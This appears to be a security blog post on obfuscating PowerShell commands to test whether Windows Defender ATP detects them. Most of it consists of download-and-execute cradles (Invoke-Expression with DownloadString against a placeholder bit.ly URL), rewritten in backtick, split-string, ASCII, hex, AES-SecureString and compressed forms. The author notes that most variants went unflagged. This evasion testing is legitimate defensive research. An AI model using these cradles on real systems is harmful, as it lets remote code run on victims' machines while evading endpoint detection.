Obfuscating PowerShell Commands

While testing Windows Defender Advanced Threat Protection (WDATP), I ran various PowerShell scripts to invoke certain downloads or specific tasks. As I was doing it, I wondered if it was smart enough to see obfuscated commands. Then I wondered how I could obfuscate them to make it harder to understand.

As an example, I will use the following command line with a made-up URL:

Invoke-Expression (New-Object System.Net.WebClient).DownloadString(“https://bit.ly/sample”)

The command, simple retrieves the file from the URL specified and loads it into the current PowerShell session. WDATP. Easily recognizes the standard command, with ease and flags it. What about if we try a few different obfuscation approaches. See for the examples used below: http://rvasec.com/slides/2017/Bohannon_Daniel–RVAsec_2017.pptx

Easy Obfuscation
Invoke-Expression (New-Object Net.WebClient).DownloadString(“htt” + “ps://” + “bit.ly/sample”)

Invoke-Expression (New-Object Net.WebClient).DownloadString(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object Net.WebClient).”`D`o`wn`l`oa`d`Str`in`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

 

Medium Obfuscation
Invoke-Expression (New-Object Net.WebClient).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (New-Object “`N`e`T`.`W`e`B`C`l`i`e`N`t”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘htt’ + ‘ps://’ + ‘bit.ly/sample’)

Invoke-Expression (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://’ + ‘bit.ly/sample’)

 

Hard Obfuscation
`I`N`V`o`k`e`-`E`x`p`R`e`s`s`i`o`N (& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)

. ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`T}.”`I`N`V`o`k`e`C`o`m`m`A`N`d”). “`N`e`w`S`c`R`i`p`T`B`l`o`c`k“((& (`G`C`M *w-O*) “`N`e`T`.`W`e`B`C`l`i`e`N`T”).”`D`o`w`N`l`o`A`d`S`T`R`i`N`g”( ‘ht’+’tps://bit.ly/sample’)))

 

Interestingly, I did not see these get flagged and show up the console. However, when I ran it this way it did:

powershell -nop -c “iex(New-Object Net.WebClient).DownloadString(‘http://bit.ly/sample’)”

Even using the “Invoke-Obfuscation” framework with something like the following three didn’t raise the alert.

ASCII Encoding
[StRiNg]::JoIn( ” , [ChaR[]](73, 110, 118 ,111,107,101, 45 , 69, 120 ,112, 114 , 101, 115 ,115 , 105,111, 110,32,40,78 , 101 ,119, 45, 79 , 98 ,106 , 101 , 99 ,116, 32 , 83, 121,115 , 116, 101,109 , 46 , 78 , 101 ,116, 46,87,101, 98 ,67 ,108,105,101 , 110, 116,41 , 46, 68 , 111 , 119, 110 ,108 ,111, 97,100 ,83 , 116 , 114, 105 ,110, 103, 40 ,39, 104 ,116 , 116, 112 ,58,47,47 ,98 , 105,116,46 , 108 , 121, 47 , 115, 97, 109 , 112,108, 101 ,39, 41 ))|& ((gv ‘*MDr*’).NamE[3,11,2]-joiN”)

HEX Encoding
&( $sHeLlId[1]+$SHeLLiD[13]+’x’)(( ( 49, ‘6e’ , 76, ‘6f’,’6b’, 65,’2d’,45 , 78, 70, 72,65 , 73, 73,69, ‘6f’ , ‘6e’ ,20,28,’4e’ ,65 , 77, ‘2d’, ‘4f’ ,62, ‘6a’, 65,63 ,74 , 20 , 53 , 79,73 ,74,65,’6d’,’2e’,’4e’ , 65 ,74 , ‘2e’ , 57,65, 62,43,’6c’ ,69, 65,’6e’, 74,29 ,’2e’, 44 , ‘6f’ , 77, ‘6e’,’6c’ , ‘6f’ ,61, 64, 53,74 , 72 ,69 , ‘6e’ , 67, 28, 27, 68 , 74,74, 70 , ‘3a’ , ‘2f’ , ‘2f’,62 , 69, 74 ,’2e’ , ‘6c’, 79,’2f’ ,73, 61 , ‘6d’ , 70 ,’6c’,65, 27, 29)|foreAcH-objeCt {([COnvERT]::tOiNT16(( $_.TOSTrinG()), 16 )-as [chAR])} ) -JOin ”)

SecureString (AES) Encoding
.( $PsHOMe[4]+$PsHoMe[34]+’x’)(([ruNtiMe.inteROpseRViCes.MaRsHaL]::ptRtoStRinGuNi( [RuNTime.iNTERoPservIcES.marSHAL]::SecureStrinGToGLoBalaLLocuniCoDE($(‘76492d1116743f0423413b16050a5345MgB8AG0ARwBnAEEAUgBGAE8AMwB6AGsAbABPAEUAcgBNADEATgB5AHMAZAB2AGcAPQA9AHwAMwAxADgAZgBkADQAOABmADQAYQA2AGUAMgBjADkAOQA0AGYAZgAxADQAZQBhADcANwBkAGQAMwBmADgAZgAyAGUAMABkAGQAMAA1ADUANgA3AGMAYgA3AGUAOQBlADYAOQBmAGYAZABjADEANgBhADYAMwA0AGIANgA3ADQAYwBlAGQAMwAxAGUAZgAxADEANAA0ADIAMABkADgANgA0AGIAOABjAGUAOABkAGYAMgAyAGMAZAA1AGMAZgAzADYAOABmADAAYwA5AGQAYQA1ADAAYwA4AGQAMABiAGIANAA4ADcAYQAzADUAYwBlADAAZAA1AGYAYwAxAGQANQBjAGEAZgBiADYAYwAxADYAZQBlAGUAMgA0ADMANwA1AGYAOABhADkAZAA1AGQAZgBjADAAMAAyADQANwBiAGIAMABmADcAOQA4AGYAMQA0ADkAZAA3AGUAMwBmADgAMQBiADMAOAA5ADUANgAzADcAYQA0AGEAOQBhAGIANAA1ADgAZgBmAGYAMQAzADQAYgA0ADcAMAA4ADcAMQA0ADIAZQBkADIANwBjADQAMAAzAGQAMgA4AGQAZgAzAGQAZQBkADYAMABjADMAMQBlADkAMgBlAGMANABiAGQAZQBkADMAMAA5AGEAMwA0ADYAZABhADkAZQBlADcAZgBlADQAMQA3AGUAZQA0ADAAMgA4AGIAMgAzAGIAYwA5ADUANQA4AGQAMwA4AGIAYwAwADQAMQBiAGIAZABjADQAMABlADgAZAA4ADYAZgA1AGYAMwAwAGYANAAxADAAOAA4ADAAYQA2AGEAZQAxADgAZgA0ADkAZAA1ADYAMgA3AGIAZQA2ADAAZgAzADQANwAzAGYAYgAxAGUAZQBmADMAMAA3AGEANAA0ADYANwA5ADcAOQAwAGYAYwA5ADcANAAwADUAMQA5ADUAMQA3AGYAYwA5ADEAOAA5ADIAYgBjAGIANgAxADEANgA2ADEAZgBiADkANQA3ADcAZgAxADQAZQA4ADIA’| cOnVeRTTo-secUrestRING -KE (242..227)) )) ))

SecureString (AES) Encoding Compressed
(new-oBJect iO.COMPRESsiOn.deflATESTreAM( [Io.MEMoRyStreAm][SYStEm.convert]::FROmbASE64stRing(‘RVRdb+JADPwreThdQVURgdBe++Y0Kxodm3SBVAqIhzbNBcrXKdCGov7483i3OvEA3rU9nhkvXsub1++7Y6zLTrybqjr9Oynrp1VRHjpbGh+WtFnc3bXm4yzhHNWJk6kap4+HcoycSUcj53m06AzVUZfbUNWTVnseLDoJbVWbWz6lv0vGGGeMsWWM5FiOGUPVH/E9Y2iqDw80YoyJKt5rNZnWq2Q43VebNKQRjTb7Itutiv2rank/Whc318Ft79X3/euboP+nG/T6gd9/8a+7g+7zoB8MdBX+IpVRVtGAhjklFD6TCqig8BPnLyb8oGFFMwp7pDSVJrwmZWjShJoeCno0dEsPDaUUblGfG+pTZEg3iBXlDZ0pirmeTjTMaGbCJUWEc84rSBN1UZcazo80zSrOi3LO43uuT4h6NNTcD/kxaUM++iToF60pqYBjKK/okyKF7wb1msI1cLhfH3ncf4X7WcXnnC/1jDtz9UkFHOnfR8zfJ9QnMl/s+og+a5mnwrkG3x5FGfMJ35x+K8zN+YGraySW8ww6cJ8KeGfpVzkdDGLghRvcp+AJ3WTuAvxPdm7EBN3Oljf0lPkHwOP7pcxPPA/6GZ5D9ESdRv4a/bXooGxf6Eisn9W5i3jm+qTCPwPPrtUL9wQeZ8Sc3zifTsBnXwPRobL1lnfuzuEv5sotP455PvGLz7918+3+IJ99bqAH85K9yTFPz+Kij8Jc//MjY/lxnewj9sA43Z1/rMNGzuE3dDDWt9xYHWbiS4H5GsSMswQv0YHxEmP1T2X/Kudv5vxbu7lj+BNgL2SPwNu4PRC/vt+Bhi490a9x/VAnuqF+jfOu3Bv2F/tiLP/UuL0BLxs38j5Ex9i+Q9v3DJzU7bHsLd6D8DHuXRr3XnL7Drhv4nxOoRf2wlg+7OvGzf8mvjg/L7wv736/+1Dj43F/dVD3WV0epnW8G3pX69LzWjeDTicI2m2PP23v66fHf0+HZbkZxdHcX1y6369zv7+4vDhdtP8B’), [iO.CoMPresSiON.cOMPresSIoNmoDE]::dEcoMPreSs) |fOrEAch{ new-oBJect Io.sTREAmReadER($_ ,[SYSteM.tExT.eNcODinG]::AsciI) } ).readtoEND( ) | & ( ([sTRInG]$VErBOSeprEFerENCE)[1,3]+’x’-Join”)

To learn more about obfuscating PowerShell commands you can use the following links:

https://github.com/danielbohannon/Invoke-Obfuscation
https://www.sans.org/summit-archives/file/summit-archive-1492186586.pdf
https://blog.varonis.com/powershell-obfuscation-stealth-through-confusion-part-i/
https://blog.varonis.com/powershell-obfuscation-stealth-confusion-part-ii/
http://pentestit.com/invoke-obfuscation-powershell-command-script-obfuscator/
https://cobbr.io/ObfuscationDetection.html
https://gallery.technet.microsoft.com/scriptcenter/Generate-obfuscated-string-6ec72ffe

Now the good news is, if these were more malicious in nature than just downloading a file, then they would be flagged. For example using this method to download “Mimikatz” will trigger an alert.

Liam Cleary

I work as an Associate Director for Protiviti in Virginia. My main focus is to ensure that SharePoint can either natively or with minimal customization meet the business requirement securely. I am currently a SharePoint MVP focused on Architecture but also cross the boundary into Development and Security. I am often found at user groups, conferences speaking, offering advice, spending time in the community, teaching my kids how to code, raspberry PI programming, hacking the planet and sometimes building Lego robots.

You may also like...